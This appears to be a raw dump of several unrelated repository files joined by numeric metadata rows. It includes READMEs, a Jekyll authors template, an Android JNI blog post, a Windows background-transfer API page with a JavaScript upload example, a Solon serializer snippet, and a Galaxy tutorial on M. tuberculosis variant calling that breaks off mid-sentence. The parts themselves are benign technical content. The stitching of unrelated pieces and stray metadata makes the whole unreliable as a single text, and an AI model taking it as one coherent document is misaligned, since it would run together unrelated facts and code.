For easy sharing, installation, and to ensure reproducibility, containers (Docker and Singularity) are available. The MIT licensed open source code can be downloaded from GitHub. The authors thank the Swedish Childhood Cancer Foundation for the funding of Barntumörbanken. We would like to acknowledge support from Science for Life Laboratory, the National Genomics Infrastructure, NGI, and UPPMAX for providing assistance in massive parallel sequencing and computational infrastructure.
51.734694
214
0.813412
eng_Latn
0.973413
6f4b35b21b769066d504204837bd1bfdda46c75d
28
md
Markdown
README.md
attam22/IceMoonLight
b979a4f2c3cdbed0ba424ce9557fb233fd7e276c
[ "Apache-2.0" ]
null
null
null
README.md
attam22/IceMoonLight
b979a4f2c3cdbed0ba424ce9557fb233fd7e276c
[ "Apache-2.0" ]
null
null
null
README.md
attam22/IceMoonLight
b979a4f2c3cdbed0ba424ce9557fb233fd7e276c
[ "Apache-2.0" ]
null
null
null
# IceMoonLight IceMoonLight
9.333333
14
0.857143
yue_Hant
0.98628
6f4d99b0b1c7ece14e2ca4e680d9acb4d2bb807f
1,673
md
Markdown
authors.md
haade-administrator/haade
7a434ec4781006584460625209c5a982d829ca06
[ "MIT" ]
null
null
null
authors.md
haade-administrator/haade
7a434ec4781006584460625209c5a982d829ca06
[ "MIT" ]
null
null
null
authors.md
haade-administrator/haade
7a434ec4781006584460625209c5a982d829ca06
[ "MIT" ]
null
null
null
--- layout: page title: Auteurs permalink: /authors comments: false --- <div class="list-authors mt-5"> {% for author in site.authors %} <div id="{{ author[1].name }}" class="authorbox position-relative pb-5 pt-5 mb-4 mt-4 border"> <div class="row"> <div class="wrapavname col-md-3 text-center"> {% if author[1].gravatar %} <img class="author-thumb" src="https://www.gravatar.com/avatar/{{ author[1].gravatar }}?s=250&d=mm&r=x" alt="{{ author.display_name }}"> {% else %} <img class="author-thumb" src="{{site.baseurl}}/{{ author[1].avatar }}" alt="{{ author.display_name }}"> {% endif %} <p class="mt-4 mb-0 small text-center"> {% if author[1].web %} <a target="_blank" class="d-inline-block mx-1 text-dark" href="{{ author[1].web }}"><i class="fa fa-link"></i></a> {% endif %} {% if author[1].twitter %} <a target="_blank" class="d-inline-block mx-1 text-dark" href="{{ author[1].twitter }}"><i class="fab fa-twitter"></i></a> {% endif %} {% if author[1].email %} <a class="d-inline-block mx-1 text-dark" href="mailto:{{ author[1].email }}"><i class="fa fa-envelope"></i></a> {% endif %} </p> </div> <div class="col-md-9"> <h3>{{ author[1].display_name }}</h3> <p class="mt-3 mb-0">{{ author[1].description }}</p> </div> </div> </div> {% endfor %} </div>
38.906977
153
0.468619
eng_Latn
0.237003
6f4eae27320e3c24788d4a13d550af209a43c4b6
1,185
markdown
Markdown
_posts/2017-07-19-Android-6.0-JNI-uses-long-store-pointer-address.markdown
neerajjose/utzcoz.github.io
8bac0cb38cf961af93048bf1832ab1a94d83aaa2
[ "Apache-2.0" ]
null
null
null
_posts/2017-07-19-Android-6.0-JNI-uses-long-store-pointer-address.markdown
neerajjose/utzcoz.github.io
8bac0cb38cf961af93048bf1832ab1a94d83aaa2
[ "Apache-2.0" ]
null
null
null
_posts/2017-07-19-Android-6.0-JNI-uses-long-store-pointer-address.markdown
neerajjose/utzcoz.github.io
8bac0cb38cf961af93048bf1832ab1a94d83aaa2
[ "Apache-2.0" ]
null
null
null
--- layout: post title: "Android 6.0 JNI uses long to store pointer address" date: 2017-07-19 22:47:00 +0800 categories: aosp --- Android 6.0 JNI uses long to store pointer address, which Android 5.0 JNI use int to store pointer address. In Android 5.0, some system servers use long to store pointer address of native object, which is stored as int. If system servers want to use pass it to native methods, it will force cast long parameter to int, for example `mPtr` in `InputManagerService.java`. But in Android 6.0, JNI uses long to store pointer address, and system servers also uses long to store pointer address of native object, for example `mPtr` in `InputManagerService.java`. Normally, if we focus on the difference, there is no problem. But I have encountered a weird problem, when I tried to cherry-pick one feature from Android 5.0 to Android 6.0 , wrote with JNI. The feature wrote in Android 5.0 with JNI force casts long parameter which stores pointer address in system server to int when invoke native methods, but when I cherry-picked it to Android 6.0, the system crashed in some occasion, because of the pointer address has changed when force be casted. WTF.
107.727273
556
0.776371
eng_Latn
0.998889
6f50a2a4ea59ea7f44c9fadb55e4e61dc9ab31d1
1,467
md
Markdown
examples/xtd.core.examples/strings/README.md
ExternalRepositories/xtd
5889d69900ad22a00fcb640d7850a1d599cf593a
[ "MIT" ]
251
2019-04-20T02:02:24.000Z
2022-03-31T09:52:08.000Z
examples/xtd.core.examples/strings/README.md
leanid/xtd
2e1ea6537218788ca08901faf8915d4100990b53
[ "MIT" ]
29
2021-01-07T12:52:12.000Z
2022-03-29T08:42:14.000Z
examples/xtd.core.examples/strings/README.md
leanid/xtd
2e1ea6537218788ca08901faf8915d4100990b53
[ "MIT" ]
27
2019-11-21T02:37:44.000Z
2022-03-30T22:59:14.000Z
# Strings examples [This folder](.) contains strings examples used by [Reference Guide](https://codedocs.xyz/gammasoft71/xtd/) and more. * [compare](compare/README.md) shows how to use [xtd::strings::compare](../../../src/xtd.core/include/xtd/strings.h) method. * [compare_ignore_case](compare_ignore_case/README.md) shows how to use [xtd::strings::compare](../../../src/xtd.core/include/xtd/strings.h) method. * [concat](concat/README.md) shows how to use [xtd::strings::concat](../../../src/xtd.core/include/xtd/strings.h) method. * [concat_collection](concat_collection/README.md) shows how to use [xtd::strings::concat](../../../src/xtd.core/include/xtd/strings.h) method. * [contains](contains/README.md) shows how to use [xtd::strings::contains](../../../src/xtd.core/include/xtd/strings.h) method. * [format](format/README.md) shows how to use [xtd::strings::format](../../../src/xtd.core/include/xtd/strings.h) method. * [format_with_orderformat_with_order](format_with_order/README.md) shows how to use [xtd::strings::format](../../../src/xtd.core/include/xtd/strings.h) method. * [join](join/README.md) shows how to use [xtd::strings::join](../../../src/xtd.core/include/xtd/strings.h) method. * [split](split/README.md) shows how to use [xtd::strings::split](../../../src/xtd.core/include/xtd/strings.h) method. * [string_unicode](string_unicode/README.md) shows how to use [xtd::strings](../../../src/xtd.core/include/xtd/strings.h) class with unicode.
97.8
160
0.710975
eng_Latn
0.700334
6f50f2becac7826c1905ca7b19999e9dd4048fd1
277
md
Markdown
_posts/trick/2021-07-05-uso-printenv.md
Martinligabue/linuxpeople_feed
a4605af51bbde2bfbc2c37fc165556b69d22a08c
[ "MIT" ]
2
2021-07-05T18:51:48.000Z
2021-08-16T10:55:00.000Z
_posts/trick/2021-07-05-uso-printenv.md
Martinligabue/linuxpeople_feed
a4605af51bbde2bfbc2c37fc165556b69d22a08c
[ "MIT" ]
null
null
null
_posts/trick/2021-07-05-uso-printenv.md
Martinligabue/linuxpeople_feed
a4605af51bbde2bfbc2c37fc165556b69d22a08c
[ "MIT" ]
1
2021-07-17T10:02:13.000Z
2021-07-17T10:02:13.000Z
--- title: printenv description: "Stampa di tutte le variabili d'ambiente" date: 2021-07-05 23:00 layout: post author: Davide Galati (in arte PsykeDady) author_github: PsykeDady tag: trick --- Stampa tutte le variabili d'ambiente della tua sessione corrente con : `printenv`
19.785714
70
0.765343
ita_Latn
0.80067
6f513e0850e6be054d68817b6b565bfaa12db86e
796
md
Markdown
README.md
javawolfpack/ClimbProject
508cf822a1eb0b78f7120a3d469ceb65e3b423f7
[ "MIT" ]
null
null
null
README.md
javawolfpack/ClimbProject
508cf822a1eb0b78f7120a3d469ceb65e3b423f7
[ "MIT" ]
5
2018-11-24T16:15:24.000Z
2022-02-11T03:40:48.000Z
README.md
javawolfpack/ClimbProject
508cf822a1eb0b78f7120a3d469ceb65e3b423f7
[ "MIT" ]
1
2018-11-24T16:13:49.000Z
2018-11-24T16:13:49.000Z
# starter_repo Repo to initialize class repositories from, setups initial CI/CD for gitlab as well ## regular files * **Dockerfile** - Initial dockerfile to help us setup our environment * **requirements.txt** - Blank requirements.txt file for us to add python package requirements into ## hidden files * **.gitignore** - ignores python code & macOS generated files that don't need to be in the repo * **.gitlab-ci.yml** - initial CI/CD pipeline file that will be used in CINS465 during class, should be modified to fit your project/code * **.coveragerc** - provides initial settings for the coverage.py package to test our CI testing coverage and omit specific files/folders/lines that are problematic. This will need to be moved and modified to be useful, and will be introduced in class.
56.857143
253
0.766332
eng_Latn
0.993966
6f51cd11954d0243af3c632b19470153e2220933
1,503
md
Markdown
archives/2012-10-09-pork-siomai.md
ulampinoy/ulampinoy-atbp
f7f3ef984d9bb2578c43e2e7f2c9238d9261b175
[ "MIT" ]
1
2020-05-05T19:03:03.000Z
2020-05-05T19:03:03.000Z
archives/2012-10-09-pork-siomai.md
ulampinoy/ulampinoy-atbp
f7f3ef984d9bb2578c43e2e7f2c9238d9261b175
[ "MIT" ]
null
null
null
archives/2012-10-09-pork-siomai.md
ulampinoy/ulampinoy-atbp
f7f3ef984d9bb2578c43e2e7f2c9238d9261b175
[ "MIT" ]
1
2020-05-11T02:37:45.000Z
2020-05-11T02:37:45.000Z
--- date: 2012-10-09T00:00:01Z description: Pinoy-style pork dim sum with spicy soy sauce dip coverImage: /static/images/pork-siomai-with-dip.jpg title: Pork Siomai tags: - archive - pork - featured --- Siomai is the Philippines most popular dim sum. You can find it everywhere – from the tiniest streets to the mega malls. Siomai is easily the fastest merienda or even an ulam option. It has the perfect combination of pork and spicy dip (saw-sawan). Siomai comes in different varieties and flavor mutations but we love the classic and simple pork siomai. ### Ingredients * 1/2 kg ground pork * 1 medium carrot, grated * 1 medium. finely chopped * 4 stalks green onions * 1 teaspoon sesame oil * 3/4 cup flour * 1 egg * wanton wrapper * salt and black pepper to taste <img src="/static/images/sesame-oil-carrots.jpg" title="Sesame oil and shredded vegetables"> ### The Dip * 2 teaspoons soy sauce * 1 teaspoon lemon juice * spicy chili-garlic paste <img src="/static/images/shredder-carrots-onion.jpg" title="Shredder, carrot and spring onion"> ### Quick Tips * If you are buying your meat from the market or meatshop, choose pork cut with layers of fat like pork belly and have it grounded twice to make finer textured dumplings. * You can add shrimp to add another layer of flavor. * Use a grater for the onions and carrots – easier and finer results than chopping with knife. Please [SUBSCRIBE to the Ulam Pinoy Channel](http://www.youtube.com/user/ulampinoy). *Salamat!*
35.785714
248
0.751164
eng_Latn
0.979403
6f521591f534ca6867854d5eec9a76984dc9b8bc
4,700
md
Markdown
README.md
nklomp/thinkcell-creator
2f84aa06d951d24a02c1e00cdb9254ce8df477f6
[ "Apache-2.0" ]
null
null
null
README.md
nklomp/thinkcell-creator
2f84aa06d951d24a02c1e00cdb9254ce8df477f6
[ "Apache-2.0" ]
1
2020-09-09T19:43:48.000Z
2020-09-09T19:43:48.000Z
README.md
nklomp/thinkcell-creator
2f84aa06d951d24a02c1e00cdb9254ce8df477f6
[ "Apache-2.0" ]
null
null
null
# Thinkcell creator This program converts a comma seperated values file (CSV) from for instance a database export and creates a Thinkcell compatible output according to a user-defined template. Please note that this program has been written in a few hours, so it lacks a lot of features and is quite crude. Having said that it does allow you to use all kinds of different input CSV files together with template files to create the ThinkCell output. Several configuration properties can be set in the file config/application.properties The template(s) can be found in the config folder as well ## Running the program To run the program execute the following command from the directory where you extracted the program: ``` thinkcellOutput.bat <input-csv-file> ``` So for instance ``` thinkcellOutput.bat /Users/nklomp/Example-Input.csv ``` If you want to run it yourself without the cmd script because you are using another Operating System then Windows, execute: ``` java -jar think-cell.*.jar <input-csv-file> ``` ## Instalation You can extract the zip file in any folder you like. No additional installation is required. This application is written in Java. So a Java Runtime Environment (https://java.com) version 8 is required. Once you have extracted the application into a folder of your choice, you will have to start the application in a command prompt in that folder. ## Template A sample template: ``` [{ "template": "template.pptx", "data": [{ "name": "Chart5", "table": [ [null, <#list headers as header>{"string": "${header}"}<#sep>,</#list>], [], <#list records as record> [<#list record as recordValue>{"<#if recordValue?is_first>string<#else>number</#if>": <#if recordValue?is_first>"${recordValue}"<#else>${recordValue}</#if>}<#sep>, </#list>]<#sep>, </#list> ] } ] }] ``` The header variable will be replaced by all the headers in the input CSV file on the first line as long as the following configuration file property is set: ``` # Whether a header line is present in the CSV file thinkcell.csv.header-line-present=true ``` The record variable will be replaced by a single line of values from the CSV file. The example above showcases a distinction for the first column, where the key is the word "string" whilst the rest of the collumns have "number" as a key. ## Output Example In the current version the output will be printed on the console. A future version will be able to write an output file as well. Since we print to the console it means you should open a CMD prompt before running the thinkcellOutput.bat file You can copy the values between the ------ CUT ------ lines ``` [{ "template": "template.pptx", "data": [{ "name": "Chart5", "table": [ [null, {"string": "CAPITAL_PROJECT_NAME"},{"string": "CAPEX"},{"string": "OPEX"},{"string": "Feedgas"},{"string": "Shipping"},{"string": "Gov''t Take"},{"string": "Non LNG Revenue (condensate, domgas)"},{"string": "LNG Delivered Cost"}], [], [{"string": "Brown"}, {"number": 1,00}, {"number": 1,30}, {"number": }, {"number": 0,89}, {"number": }, {"number": 1,98}, {"number": 6,93}], [{"string": "Fair"}, {"number": 1,79}, {"number": 2,00}, {"number": }, {"number": 0,44}, {"number": }, {"number": 1,10}, {"number": 2,20}], [{"string": "Neo"}, {"number": 1,20}, {"number": 0,91}, {"number": 4,00}, {"number": 0,58}, {"number": }, {"number": 0,84}, {"number": 3,00}], [{"string": "Gogo"}, {"number": 1,00}, {"number": 1,00}, {"number": }, {"number": 1,20}, {"number": }, {"number": 0,44}, {"number": 3,00}], [{"string": "Quick win"}, {"number": 2,00}, {"number": 1,22}, {"number": 2,00}, {"number": 1,00}, {"number": }, {"number": 0,76}, {"number": 5,05}], [{"string": "Triumph"}, {"number": 1,00}, {"number": 0,83}, {"number": 1,00}, {"number": 0,59}, {"number": }, {"number": 0,54}, {"number": 4,79}] ] } ] }] ``` ## Current configuration support ```properties # The delimer used in the CSV file thinkcell.csv.delimeter=; # Whether a header line is present in the CSV file thinkcell.csv.header-line-present=true # CSV format to use. One of "excel", "default" thinkcell.csv.format=excel # The directory where the templates are stored thinkcell.template.directory=src/main/resources/ # The template file to use for the output json thinkcell.template.output-file=output-template.ftl # The template local US by default thinkcell.template.locale=en-US ```
38.842975
254
0.638085
eng_Latn
0.980684
6f52d03dded6864edd3e13b0b7a3f66dd5aef478
31
md
Markdown
README.md
Ameejr/Door-automatic-control-system
2fccfdf32c3bd9455daa786c3718513662bcb841
[ "BSL-1.0" ]
1
2021-03-13T05:55:31.000Z
2021-03-13T05:55:31.000Z
README.md
Ameejr/Door-automatic-control-system
2fccfdf32c3bd9455daa786c3718513662bcb841
[ "BSL-1.0" ]
null
null
null
README.md
Ameejr/Door-automatic-control-system
2fccfdf32c3bd9455daa786c3718513662bcb841
[ "BSL-1.0" ]
null
null
null
# Door-automatic-control-system
31
31
0.83871
nld_Latn
0.203373
6f52e2becfaebe3dcb458181f332fb345024be77
2,218
md
Markdown
windows.networking.backgroundtransfer/backgroundtransfercontentpart.md
stefb965/winrt-api
89da6197d3c4c09e3bbb4966b984a6da790614f3
[ "CC-BY-4.0", "MIT" ]
null
null
null
windows.networking.backgroundtransfer/backgroundtransfercontentpart.md
stefb965/winrt-api
89da6197d3c4c09e3bbb4966b984a6da790614f3
[ "CC-BY-4.0", "MIT" ]
null
null
null
windows.networking.backgroundtransfer/backgroundtransfercontentpart.md
stefb965/winrt-api
89da6197d3c4c09e3bbb4966b984a6da790614f3
[ "CC-BY-4.0", "MIT" ]
1
2022-03-12T22:14:59.000Z
2022-03-12T22:14:59.000Z
--- -api-id: T:Windows.Networking.BackgroundTransfer.BackgroundTransferContentPart -api-type: winrt class --- <!-- Class syntax. public class BackgroundTransferContentPart : Windows.Networking.BackgroundTransfer.IBackgroundTransferContentPart --> # Windows.Networking.BackgroundTransfer.BackgroundTransferContentPart ## -description Represents a content part of a multi-part transfer request. Each [BackgroundTransferContentPart](backgroundtransfercontentpart.md) object can represent either a single string of text content or a single file payload, but not both. ## -remarks ## -examples The following example demonstrates how to configure and begin a multi-part upload operation, and is based on the [Background Transfer sample](http://go.microsoft.com/fwlink/p/?linkid=245064) offered in the Windows Sample Gallery. ```javascript var upload = null; var promise = null; function MultipartUpload (uriString, files) { try { var uri = Windows.Foundation.Uri(uriString); var uploader = new Windows.Networking.BackgroundTransfer.BackgroundUploader(); var contentParts = []; files.forEach(function (file, index) { var part = new Windows.Networking.BackgroundTransfer.BackgroundTransferContentPart("File" + index, file.name); part.setFile(file); contentParts.push(part); }); // Create a new upload operation. uploader.createUploadAsync(uri, contentParts).then(function (uploadOperation) { // Start the upload and persist the promise to be able to cancel the upload. upload = uploadOperation; promise = uploadOperation.startAsync().then(complete, error, progress); }); } catch (err) { displayError(err); } }; ``` ## -see-also [CreateDownload(Uri, IStorageFile, IStorageFile)](backgrounddownloader_createdownload_1461958690.md), [CreateUploadAsync](backgrounduploader_createuploadasync.md) ## -capabilities internetClient, internetClientServer, privateNetworkClientServer
40.327273
230
0.674482
eng_Latn
0.406922
6f53050f433183e786a69e20e8a8501d3ff4dc2e
742
md
Markdown
_extend/solon.serialization.snack3/README.md
hanxiao34/solon
5b25e7810859d583f9f2e90ded955198a16b21e4
[ "Apache-2.0" ]
1
2022-01-24T06:01:27.000Z
2022-01-24T06:01:27.000Z
_extend/solon.serialization.snack3/README.md
hanxiao34/solon
5b25e7810859d583f9f2e90ded955198a16b21e4
[ "Apache-2.0" ]
null
null
null
_extend/solon.serialization.snack3/README.md
hanxiao34/solon
5b25e7810859d583f9f2e90ded955198a16b21e4
[ "Apache-2.0" ]
1
2022-02-07T08:52:16.000Z
2022-02-07T08:52:16.000Z
### 格式化定制 ```java public class DemoApp { public static void main(String[] args){ Solon.start(DemoApp.class, args, app->{ initMvcJsonCustom(); }); } /** * 初始化json定制(需要在插件运行前定制) */ private static void initMvcJsonCustom() { //通过转换器,做简单类型的定制 SnackRenderFactory.global .addConvertor(Date.class, s -> s.getTime()); SnackRenderFactory.global .addConvertor(LocalDate.class, s -> s.format(DateTimeFormatter.ofPattern("yyyy-MM-dd"))); SnackRenderFactory.global .addConvertor(LocalDateTime.class, s -> s.format(DateTimeFormatter.ofPattern("yyyy-MM-dd HH:mm"))); SnackRenderFactory.global.add } } ```
23.935484
115
0.595687
kor_Hang
0.245623
6f533c1685abc5850d5d11eb400954abd27636a1
30,083
md
Markdown
topics/variant-analysis/tutorials/tb-variant-analysis/tutorial.md
annefou/training-material
7712cca2ff5f09a594a040529d99dd8bce7a418b
[ "MIT" ]
null
null
null
topics/variant-analysis/tutorials/tb-variant-analysis/tutorial.md
annefou/training-material
7712cca2ff5f09a594a040529d99dd8bce7a418b
[ "MIT" ]
null
null
null
topics/variant-analysis/tutorials/tb-variant-analysis/tutorial.md
annefou/training-material
7712cca2ff5f09a594a040529d99dd8bce7a418b
[ "MIT" ]
2
2019-07-05T10:05:35.000Z
2021-12-28T10:12:07.000Z
--- layout: tutorial_hands_on title: "M. tuberculosis Variant Analysis" zenodo_link: https://doi.org/10.5281/zenodo.3496437 tags: - prokaryote questions: - "How do we detect differences between a set of reads from *M. tuberculosis* (Mtb) and the Mtb reference genome" objectives: - "How should we filter those variants" - "How can we predict drug resistance from those variants" - "How do we annotate those variants" time_estimation: "2h" level: Intermediate key_points: - variants in *M. tuberculosis* sequencing data can be discovered using common microbial bioinformatics tools - it is not enough to just call variants, variant calling involves multiple quality control steps - the choice of reference genome and some quality control procedures are species specific, and require knowledge of the organism in question contributors: - pvanheus - slugger70 - thobalose --- # Introduction {:.no_toc} Tuberculosis (TB) is an infectious disease caused by the bacterium *Mycobacterium tuberculosis*. According to the [WHO](https://www.who.int/tb/publications/global_report/en/), in 2018 there were 10.0 million new cases of TB worldwide and 1.4 million deaths due to the disease, making TB the world's most deadly infectious disease. The [publication](https://www.ncbi.nlm.nih.gov/pubmed/9634230) of the genome of *M. tuberculosis H37Rv* in 1998 gave researchers a powerful new tool in understanding this pathogen. This genome has been revised since then, with the latest version being available as RefSeq entry [NC_000962.3](https://www.ncbi.nlm.nih.gov/nuccore/NC_000962.3/). The genome comprises a single circular chromosome of some 4.4 megabases. The H37Rv strain that the genome was sequenced from is a long-preserved laboratory strain, originally [isolated](https://www.ncbi.nlm.nih.gov/pmc/articles/PMC2132400) from a patient in 1905 and [named](https://journals.sagepub.com/doi/abs/10.3181/00379727-33-8330P) as H37Rv in 1935. It is notably different in some genomic [regions](https://www.sciencedirect.com/science/article/pii/S0888754317300617?via%3Dihub) from some modern clinical strains but remains the standard reference sequence for *M. tuberculosis* (Mtb). In a larger context *M. tuberculosis* is a prominent member of the Mycobacterium Tuberculosis Complex (MTBC). This group of related species comprises of the [8](https://www.nature.com/articles/s41467-020-16626-6) [lineages](https://www.ncbi.nlm.nih.gov/pubmed/29456241) of human-infecting *M. tuberculosis* as well as predominantly animal-infecting species such as *M. bovis* and *M. pinnipedii*. Two other close relatives of Mtb, *M. leprae* and *M. lepromatosis* circulate between humans, causing the disease leprosy. Finally amongst the Mycobacteria there are several other species that live in the environment and can cause human disease. These are the [Nontuberculous Mycobacteria](https://www.ncbi.nlm.nih.gov/pubmed/28345639). Variation in the genome of *M. tuberculosis* (Mtb) is associated with changes in phenotype, for example [drug resistance](https://genomemedicine.biomedcentral.com/articles/10.1186/s13073-019-0660-8) and virulence. It is also useful for [outbreak investigation](https://www.frontiersin.org/articles/10.3389/fpubh.2019.00087/full) as the single nucleotide polymorphisms (SNPs) in a sample can be used to build a phylogeny. This tutorial will focus on identifying genomic variation in Mtb and using that to explore drug resistance and other aspects of the bacteria. # Get your data The data for today is a sample of *M. tuberculosis* [collected](https://www.ncbi.nlm.nih.gov/bioproject/PRJEB18529) from a [southern African patient](https://bmcmedicine.biomedcentral.com/articles/10.1186/s12916-017-0834-4). In addition to the bacterial sequence sample we will work with a Genbank format version of the genome of the [inferred](https://www.nature.com/articles/ng.590) most recent common [ancestor](https://zenodo.org/record/3497110) of the M. tuberculosis complex which is combined with the annotation of the H37Rv reference sequence. This ancestral genome only differs from the H37Rv version 3 genome ([NC_000962.3](https://www.ncbi.nlm.nih.gov/nuccore/NC_000962.3)) by the insertion of SNPs to try and model the ancestor of all lineages of Mtb. > ### {% icon hands_on %} Hands-on: Get the data > > 1. {% tool [Import](upload1) %} the following files from [Zenodo](https://doi.org/10.5281/zenodo.3960260) or from the shared data library >``` >https://zenodo.org/record/3960260/files/004-2_1.fastq.gz >https://zenodo.org/record/3960260/files/004-2_2.fastq.gz >https://zenodo.org/record/3960260/files/Mycobacterium_tuberculosis_ancestral_reference.gbk >https://zenodo.org/record/3960260/files/MTB_ancestor_reference.fasta >https://zenodo.org/record/3960260/files/Mycobacterium_tuberculosis_h37rv.ASM19595v2.45.chromosome.Chromosome.gff3 >``` > > {% snippet snippets/import_via_link.md %} > {% snippet snippets/import_from_data_library.md %} > {: .hands_on} # Quality control This step serves the purpose of identifying possible issues with the raw sequenced reads input data before embarking on any "real" analysis steps. Some of the typical problems with NGS data can be mitigated by preprocessing affected sequencing reads before trying to map them to the reference genome. Detecting some other, more severe problems early on may at least save you a lot of time spent on analyzing low-quality data that is not worth the effort. Here, we will perform a standard quality check on our input data and only point out a few interesting aspects about that data. For a more thorough explanation of NGS data quality control, you may want to have a look at the dedicated tutorial on ["Quality control"]({% link topics/sequence-analysis/tutorials/quality-control/tutorial.md %}). > ### {% icon hands_on %} Hands-on: Quality control of the input datasets > > 1. Execute {% tool [FastQC](toolshed.g2.bx.psu.edu/repos/devteam/fastqc/fastqc/0.72+galaxy1) %} {% icon tool %} on both of your fastq datasets > > - {% icon param-files %} *"Short read data from your current history"*: select both FASTQ datasets. > > {% snippet snippets/select_multiple_datasets.md %} > > The **FastQC** {% icon tool %} input form looks like this. You only need to pay attention to the top part > where *Short read data from your current history* is selected. Leave all the other parameters at their default > values and click *Execute*. > > ![FastQC input and dependencies](../../images/mt_qc.png) > > When you start this job, four new datasets (one with the calculated raw > data, another one with an html report of the findings for each input > dataset) will get added to your history. > {: .hands_on} While one could examine the quality control report for each set of reads (forward and reverse) independently but it is quite useful to example them side by side using the **MultiQC** tool. > ### {% icon hands_on %} Hands-on: Combining QC results > > 1. Use {% tool [MultiQC](toolshed.g2.bx.psu.edu/repos/iuc/multiqc/multiqc/1.8+galaxy0) %} {% icon tool %} to aggregate the raw **FastQC** data of all input datasets into one report > - In *"Results"* > - *"Which tool was used generate logs?"*: `FastQC` > - In *"FastQC output"* > - *"Type of FastQC output?"*: `Raw data` > - {% icon param-files %} *"FastQC output"*: both *RawData* > outputs of **FastQC** {% icon tool %}) > > 2. Using the {% icon galaxy-eye %} button, inspect the *Webpage* output produced by the tool > > > ### {% icon question %} Questions > > > > 1. Based on the report, do you think preprocessing of the reads > > (trimming and/or filtering) will be necessary before mapping? > > > > > ### {% icon solution %} Solution > > > > > > 1. Sequence quality is quite good overall. If anything you might > > > consider trimming the 3' ends of reads (base qualities decline > > > slightly towards the 3' ends) or to filter out the small fraction > > > of reads with a mean base quality < 5. > > > We will run **Trimmomatic** {% icon tool %} on the > > > fastq datasets in the next step > > > > > {: .solution} > {: .question} > {: .hands_on} As these reads look like they need a bit of trimming, we can turn to the **Trimmomatic** tool to clean up our data. > ### {% icon hands_on %} Hands-on: Quality trimming > 1. Use {% tool [Trimmomatic](toolshed.g2.bx.psu.edu/repos/pjbriggs/trimmomatic/trimmomatic/0.36.5) %} {% icon tool %} to clean up the reads and remove the poor quality sections. > - *"Single-end or paired-end reads?"*: `Paired End (two separate input files)` > - {% icon param-files %} *"Input FASTQ file (R1/first of pair)"*: `004-2_1.fastq.gz` > - {% icon param-files %} *"Input FASTQ file (R2/second of pair)"*: `004-2_2.fastq.gz` > - *Select Trimmomatic operation to perform* > - Keep the default value of **Sliding window trimming** and adjust the average quality required to 30 > - *"+Insert Trimmomatic Operation"* > - *"Select Trimmomatic operation to perform"*: `Drop reads below a specified length (MINLEN)` > - *"Minimum length of reads to be kept"*: `20` > > 2. Inspect the output produced by Trimmomatic > > > ### {% icon question %} Questions > > > > 1. Why are there 4 output read files instead of 2? > > > > > ### {% icon solution %} Solution > > > > > > 1. There are 4 output files: Forwards paired and single reads and reverse paired and single reads. The single reads come about when one read in a pair of reads has failed the quality checks and so is deleted. The other half of the pair may still be good and so it is put into the single reads file for the appropriate direction. While un-paired reads might sometimes be useful, paired reads are more useful because they both the sequence and the gap between reads ("insert size") can be used for further analysis. In a typical analysis, only paired reads are used. > > > > > {: .solution} > {: .question} {: .hands_on} *Note:* We would normally examine our trimmed reads with **FastQC** and **MultiQC** again to see if the quality trimming has been successful, but in this tutorial we will move straight on to save time. # Look for contamination with Kraken2 (optional) We should also look for contamination in our reads. Sometimes, other sources of DNA accidentally or inadvertantly get mixed in with our sample. Any reads from non-sample sources will confound our snp analysis. **Kraken 2** is an effective way of looking and which species is represented in our reads and so we can easily spot possible contamination of our sample. Unfortunately **kraken2** uses a lot of RAM (typically 50GB when used with the *Standard* database), so you might want to skip this step if your environment doesn't have enough computing nodes able to process such jobs. For an example of a probably-contaminated sample that does not use **kraken2** as part of its analysis, see the optional section on analysing *SRR12416842* at the end of this tutorial. > ### {% icon hands_on %} Hands-on: Run Kraken2 > > 1. Execute {% tool [Kraken2](toolshed.g2.bx.psu.edu/repos/iuc/kraken2/kraken2/2.0.8_beta+galaxy0) %} {% icon tool %} with the following parameters > - *"Single or paired reads"*: `Paired` > - *"Forward Strand"*: `Trimmomatic on X (R1 paired)` > - *"Reverse Strand"*: `Trimmomatic on X (R2 paired)` > > - *"Print scientific names instead of just taxids"*: `Yes` > - *"Enable quick operation"*: `Yes` > - Under *"Create reports"*: > - *"Print a report with aggregrate counts/clade to file"*: `Yes` > - *"Select a Kraken2 database"*: `Standard` > > 2. Inspect the report produced by Kraken > > > ### {% icon question %} Questions > > > > 1. Was there any significant contamination of the sample? > > > > > ### {% icon solution %} Solution > > > > > > 1. 91.18% of the reads here have been positively identified as *Mycobacterium*. The others found were bacteria from the same kingdom. There were no contaminating human or viral sequences detected. > > > > > {: .solution} > {: .question} {: .hands_on} # Find variants with Snippy We will now run the Snippy tool on our reads, comparing it to the reference. Snippy is a tool for rapid bacterial SNP calling and core genome alignments. Snippy finds SNPs between a haploid reference genome and your NGS sequence reads. It will find both substitutions (snps) and insertions/deletions (indels). If we give Snippy an annotated reference in Genbank format, it will run a tool called SnpEff which will figure out the effect of any changes on the genes and other features. If we just give Snippy the reference sequence alone without the annotations, it will not run SnpEff. We have an annotated reference built from the inferred *M. tuberculosis* [ancestral reference genome](https://zenodo.org/record/3497110) and the gene annotation from the [H37Rv strain](https://www.ncbi.nlm.nih.gov/nuccore/NC_000962.3) so will use it in this case. > ### {% icon hands_on %} Hands-on: Run Snippy > > 1. {% tool [Snippy](toolshed.g2.bx.psu.edu/repos/iuc/snippy/snippy/4.5.0) %} {% icon tool %} with the following parameters > - *"Will you select a reference genome from your history or use a built-in index?"*: `Use a genome from history and build index` > - *"Use the following dataset as the reference sequence"*: `Mycobacterium_tuberculosis_ancestral_reference.gbk` > - *"Single or Paired-end reads"*: `Paired` > - *"Select first set of reads"*: `Trimmomatic on X (R1 paired)` > - *"Select second set of reads"*: `Trimmomatic on X (R2 paired)` > > - Under *"Advanced parameters"* > - *"Minimum proportion for variant evidence"*: `0.1` (This is so we can see possible rare variants in our sample) > - Under *"Output selection"* select the following: > - *"The final annotated variants in VCF format"* > - *"A simple tab-separated summary of all the variants"* > - *"The alignments in BAM format"* > - Deselect any others. > > 2. Inspect the Snippy VCF output > > > ### {% icon question %} Questions > > > > 1. What type of variant is the first one in the list? > > > > 2. What was the effect of this variant on the coding region it was found in? > > > > 3. How many variants were found? > > > > > ### {% icon solution %} Solution > > > > > > 1. Substitution of a `C` to a `T`. This variant is supported by 134 reads. > > > > > > 2. According to SnpEff, it's a Synonymous change in Rv0002. > > > > > > 3. 1086 variants are found. To count variants, look at how many non-comment lines are in the snippy VCF output or hw many lines (excluding the header) there are in This is quite typical for *M. tuberculosis* > > {: .solution} > {: .question} {: .hands_on} **RECAP**: So far we have taken our sample reads, cleaned them up a bit, checked for taxonomic 